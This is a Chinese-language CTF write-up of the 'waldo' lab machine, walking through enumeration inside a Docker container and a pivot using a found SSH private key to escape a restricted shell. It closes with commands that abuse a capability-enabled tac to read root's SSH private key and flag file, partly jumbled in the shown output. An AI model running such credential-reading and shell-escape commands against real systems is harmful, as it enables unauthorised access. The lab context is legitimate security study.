waldo(docker虚拟机-linux capabilities提权)

续上篇

拿到一个ssh shell,准备提权。

trying

1

1
2
uname -a
Linux waldo 4.9.0-6-amd64

无gcc

2

1
2
cat /etc/passwd | grep home
nobody:x:65534:65534:nobody:/home/nobody:/bin/sh

普通用户就一个

1
2
3
4
5
sudo -l
-sh: sudo: not found

su root
-sh: su: not found

意识到su命令不可能没有,于是想要反弹一个bash shell

1
2
ssh -i id_rsa nobody@10.10.10.87 bash
sh: bash: not found

喵喵喵??于是回头看一下/etc/passwd。root:x:0:0:root:/root:/bin/ash

哦哦~

1
2
ssh -i id_rsa nobody@10.10.10.87 ash
成功得到ash shell,但遗憾的是ash 和 sh没有太大区别

尝试用python,但是os.py被删掉了==

1
python -c 'import pty; pty.spawn("/bin/bash")'

3

ps -ef | grep root

1
2
3
4
5
6
  1 root       1:57 {supervisord} /usr/bin/python2 /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
  7 root       0:00 nginx: master process nginx -g daemon off;
  8 root       0:00 /usr/sbin/sshd -D -e
  9 root       0:27 {php-fpm7} php-fpm: master process (/etc/php7/php-fpm.conf)
111 root       0:00 sshd: nobody [priv]
120 nobody     0:00 grep root
1
2
3
4
/etc/php7/php-fpm.d
-rw-r--r--    1 root     root         18767 Mar 31  2018 www.conf
-rw-r--r--    1 root     root          1374 May  3  2018 zzz_custom.conf
no thing intersting here

4

1
2
3
cd /
ls -al .dockerenv
-rwxr-xr-x    1 root     root             0 May  3  2018 .dockerenv

说明这是一个虚拟机容器,(⊙﹏⊙),虚拟机逃逸怎么做?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
find . -name "docker"
find: ./proc/tty/driver: Permission denied
find: ./proc/1/task/1/fd: Permission denied
find: ./proc/1/task/1/fdinfo: Permission denied
find: ./proc/1/task/1/ns: Permission denied
find: ./proc/1/fd: Permission denied
。。。省略。。。

ifconfig
docker0   Link encap:Ethernet  HWaddr 02:42:E2:B2:82:F0  
          inet addr:172.17.0.1  Bcast:172.17.255.255  Mask:255.255.0.0
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

ens33     Link encap:Ethernet  HWaddr 00:50:56:A4:3E:15  
          inet addr:10.10.10.87  Bcast:10.10.10.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:394742 errors:0 dropped:166 overruns:0 frame:0
          TX packets:221201 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:27756425 (26.4 MiB)  TX bytes:18990614 (18.1 MiB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:1410 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1410 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:259632 (253.5 KiB)  TX bytes:259632 (253.5 KiB)

ping 172.17.0.1
PING 172.17.0.1 (172.17.0.1): 56 data bytes
ping: permission denied (are you root?)

在freebuf、乌云镜像中,虚拟机逃逸的文都很少==

看看writeup。

用这条命令,可以检查现有的shell是不是运行在docker容器中。
grep -i docker /proc/self/cgroup 2>/dev/null;find / -name "*dockerenv*" - exec ls -la {} \; 2>/dev/null

netstat命令

Linux netstat命令详解
netstat without netstat

在home家目录下,有一个公钥,暗示了一个用户monitor。

.monitor是私钥

sshd_config

cat /etc/ssh/sshd_config

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
#	$OpenBSD: sshd_config,v 1.101 2017/03/14 07:19:07 djm Exp $

# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.

# This sshd was compiled with PATH=/bin:/usr/bin:/sbin:/usr/sbin

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.

Port 8888
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_dsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key

# Ciphers and keying
#RekeyLimit default none

# Logging
#SyslogFacility AUTH
#LogLevel INFO

# Authentication:

#LoginGraceTime 2m
PermitRootLogin no
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10

#PubkeyAuthentication yes

# The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2
# but this is overridden so installations will only check .ssh/authorized_keys
AuthorizedKeysFile	.ssh/authorized_keys

#AuthorizedPrincipalsFile none

#AuthorizedKeysCommand none
#AuthorizedKeysCommandUser nobody

# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes

# To disable tunneled clear text passwords, change to no here!
PasswordAuthentication no
#PermitEmptyPasswords no

# Change to no to disable s/key passwords
ChallengeResponseAuthentication no

# Kerberos options
#KerberosAuthentication no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
#KerberosGetAFSToken no

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes

# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication.  Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
#UsePAM no

#AllowAgentForwarding yes
#AllowTcpForwarding yes
#GatewayPorts no
#X11Forwarding no
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
#PrintMotd yes
#PrintLastLog yes
#TCPKeepAlive yes
#UseLogin no
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none

# no default banner path
#Banner none

# override default of no subsystems
Subsystem	sftp	/usr/lib/ssh/sftp-server

# the following are HPN related configuration options
# tcp receive buffer polling. disable in non autotuning kernels
#TcpRcvBufPoll yes
 
# disable hpn performance boosts
#HPNDisabled no

# buffer size for hpn to non-hpn connections
#HPNBufferSize 2048


# Example of overriding settings on a per-user basis
#Match User anoncvs
#	X11Forwarding no
#	AllowTcpForwarding no
#	PermitTTY no
#	ForceCommand cvs server
AllowUsers nobody

ListenAddress 0.0.0.0 ssh监听本地地址

获得另一个shell

monitor rshell

通过以上信息搜集,知道这是一个docker虚拟机。
这个主机/etc/passwd,没有monitor用户,但是home目录有ssh私钥。
通过查看ssh配置文件,得知监听本地端口。

于是我们可以尝试连接本地,来访问宿主机。

ssh monitor@127.0.0.1 -i .monitor -t bash
用这条命令,得到bash shell

比较一下ssh加-t、不加-t


cat,command not found

直观来看,加-t参数,有些命令没有,可能是环境变量的原因。

不加-t参数,虽然命令都有,但是显示起来,回显没有颜色,不直观

其余的东西,因时间所限,以后再找一下相关资料。

提权前的信息搜集

有三个普通用户

1
2
3
steve:x:1000:1000:steve,,,:/home/steve:/bin/bash
monitor:x:1001:1001:User for editing source and monitoring logs,,,:/home/monitor:/bin/rbash
app-dev:x:1002:1002:User for managing app-dev,,,:/home/app-dev:/bin/bash

/home/monitor

1
2
3
4
5
6
7
8
9
10
11
12
13
ls -al
total 40
drwxr-x--- 5 root    monitor 4096 Jul 24 07:58 .
drwxr-xr-x 5 root    root    4096 May  3  2018 ..
drwxrwx--- 3 app-dev monitor 4096 May  3  2018 app-dev
lrwxrwxrwx 1 root    root       9 Jul 24 07:58 .bash_history -> /dev/null
-r--r----- 1 root    monitor   15 May  3  2018 .bash_login
-r--r----- 1 root    monitor   15 May  3  2018 .bash_logout
-r--r----- 1 root    monitor   15 May  3  2018 .bash_profile
-r--r----- 1 root    monitor 3598 May  3  2018 .bashrc
dr-xr-x--- 2 root    monitor 4096 May  3  2018 bin
-r--r----- 1 root    monitor   15 May  3  2018 .profile
dr-x------ 2 monitor monitor 4096 May  3  2018 .ssh

ls -iR

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
656302 app-dev
656301 bin

./app-dev:
656314 logMonitor
656315 logMonitor.bak
656309 logMonitor.c
656310 logMonitor.h
656312 logMonitor.h.gch
656313 logMonitor.o
656311 makefile
656303 v0.1

./app-dev/v0.1:
656316 logMonitor-0.1

./bin:
656305 ls
656307 most
656306 red
656308 rnano

1
2
3
4
getcap -r * 2>/dev/null
/usr/bin/tac -s @ /root/.ssh/id_rsa
/usr/bin/tac | /root/.ssh/id_rsa | /usr/bin/tac
tac /root/root.txt

总结:

getcap、tac、docker虚拟机、linux capabilities等概念都是第一次遇到==

下一次单独开一篇,探讨下权限问题。

唉~头疼